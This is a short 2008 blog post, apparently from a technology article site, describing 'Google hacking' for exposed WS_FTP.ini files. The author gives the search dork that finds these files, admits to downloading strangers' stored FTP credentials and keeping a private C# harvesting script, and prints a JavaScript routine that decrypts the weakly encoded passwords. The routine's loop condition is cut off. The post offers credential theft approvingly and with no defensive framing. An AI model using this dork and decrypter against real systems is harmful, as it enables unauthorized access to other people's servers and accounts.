Hacking through GoogleCategory: Technology
Written by: Azeem yaseen (on January 01, 2008 - 12:10 AM)E-Mail Article to a Friend
Quite recently i was wondering to install an ftp server on my box.(Windows one) i got it downloaded from the website and was using it without any problem.Then all of the sudden i acciedently opened up the folder of WS_FTP and got a look on WS_FTP.ini file. It's where all the usernames and passwords of the ftp sites you connect are stored, wow!
This made me curious what if some one have shared his WS_FTP.ini File! Could be ! Fire up the browser and asked google if is there any fool around! ;) With dork inurl:WS_FTP filetype:ini guess what i got 100's of results!! I Downloaded their WS_FTP.ini file and then i had all the accounts with FTP usernames and hosts! i now had to decrypt the PASSWORDs. The next platform was Securityfocus.com! Did a search on it and found that WS_FTP have a loosy way of storing password which lead me to a java script !--
// ************ CODE WSFTP ***************************
function cogecifrado(str) {
if (str.indexOf('PWD=', 0) == -1 ||
str.length-37<0)
alert("You should Include :'PWD='");
else {
passw=str.substring(37,str.length);
for (var i = 0; i
{
var caracter=passw.substring(i*2,i*2+2);
var sal=str.substring(5+i,6+i);
var claro=parseInt("0x"+caracter) -i -1 - ((47+parseInt("0x"+sal))%57);
document.form1.text2.value=document.form1.text2.value+String.fromCharCode(claro);
}
}
}
// -->
// ********* WS FTP Password Decrypter *********** Make a form and do a call to cogecifrado(str) would decrypt the password and place the value in text2 of form1 Great! We have 100's of people sharing there WS_FTP . I wrote a small script in C# For my personal use to get
some ftp accounts via this technique !! Peace :D Happy Google hacking ! and a new year! Share your thoughts by posting a Talk-Back:
| 
Subscribe to our RSS Feed
